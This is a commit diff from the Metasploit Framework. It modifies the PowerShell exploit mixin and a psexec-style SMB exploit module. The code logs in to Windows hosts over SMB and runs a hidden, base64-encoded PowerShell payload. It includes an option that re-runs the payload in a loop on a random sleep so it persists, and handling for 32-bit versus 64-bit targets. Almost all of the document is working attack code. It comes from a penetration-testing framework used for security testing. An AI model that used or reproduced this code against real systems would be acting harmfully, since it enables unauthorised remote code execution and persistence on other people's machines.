Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import

bug/bundler_fix
RageLtMan 2013-07-31 18:39:46 -04:00
commit 2c850d8f8b
2 changed files with 35 additions and 22 deletions

View File

@ -11,7 +11,9 @@ module Exploit::Powershell
super super
register_advanced_options( register_advanced_options(
[ [
OptBool.new('RUN_WOW64', [ OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
OptBool.new('PSH::RUN_WOW64', [
false, false,
'Execute powershell in 32bit compatibility mode, payloads need native arch', 'Execute powershell in 32bit compatibility mode, payloads need native arch',
false false
@ -98,7 +100,7 @@ EOS
# #
# Creates cmd script to execute psh payload # Creates cmd script to execute psh payload
# #
def cmd_psh_payload(pay, old_psh=false) def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
# Allow powershell 1.0 format # Allow powershell 1.0 format
if old_psh if old_psh
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay) psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@ -106,14 +108,14 @@ EOS
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay) psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
end end
# Run our payload in a while loop # Run our payload in a while loop
if datastore['PERSIST'] if datastore['PSH::PERSIST']
fun_name = Rex::Text.rand_text_alpha(rand(2)+2) fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
sleep_time = rand(5)+5 sleep_time = rand(5)+5
psh_payload = "function #{fun_name}{#{psh_payload}};" psh_payload = "function #{fun_name}{#{psh_payload}};"
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};" psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
end end
# Determine appropriate architecture, manual method reduces script size # Determine appropriate architecture, manual method reduces script size
ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
# Wrap in hidden runtime # Wrap in hidden runtime
psh_payload = run_hidden_psh(psh_payload,ps_bin) psh_payload = run_hidden_psh(psh_payload,ps_bin)
# Convert to base64 for -encodedcommand execution # Convert to base64 for -encodedcommand execution

View File

@ -1,6 +1,14 @@
# -*- coding: binary -*- # -*- coding: binary -*-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core' require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
@ -8,8 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Exploit mixins should be called first # Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Psexec include Msf::Exploit::Remote::SMB::Psexec
include Msf::Exploit::Powershell include Msf::Exploit::Powershell
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -29,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => [ 'Author' => [
'RageLtMan <rageltman[at]sempervictus' 'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -48,9 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 1999',
'References' => [ 'References' => [
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'], [ 'OSVDB', '3106'],
@ -61,43 +70,45 @@ class Metasploit3 < Msf::Exploit::Remote
)) ))
register_options([ register_options([
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
OptBool.new('DryRun',[false,'dry run',false]), OptBool.new('DryRun',[false,'dry run',false]),
], self.class) ], self.class)
end end
def exploit def exploit
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD']) command = cmd_psh_payload(payload.encoded)
if datastore['DryRun'] if datastore['DryRun']
print_good command print_good command
return return
end end
#Try and authenticate with given credentials if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
end
# Try and authenticate with given credentials
if connect if connect
begin begin
smb_login smb_login
rescue StandardError => autherror rescue StandardError => autherror
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
return ensure
disconnect
end end
# Execute the powershell command # Execute the powershell command
begin
print_status("#{peer} - Executing the payload...") print_status("#{peer} - Executing the payload...")
#vprint_good(command) begin
return psexec(command) return psexec(command)
rescue StandardError => exec_command_error rescue StandardError => exec_command_error
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
return false ensure
end
disconnect disconnect
end end
end end
end
def peer def peer
return "#{rhost}:#{rport}" return "#{rhost}:#{rport}"
end end
end end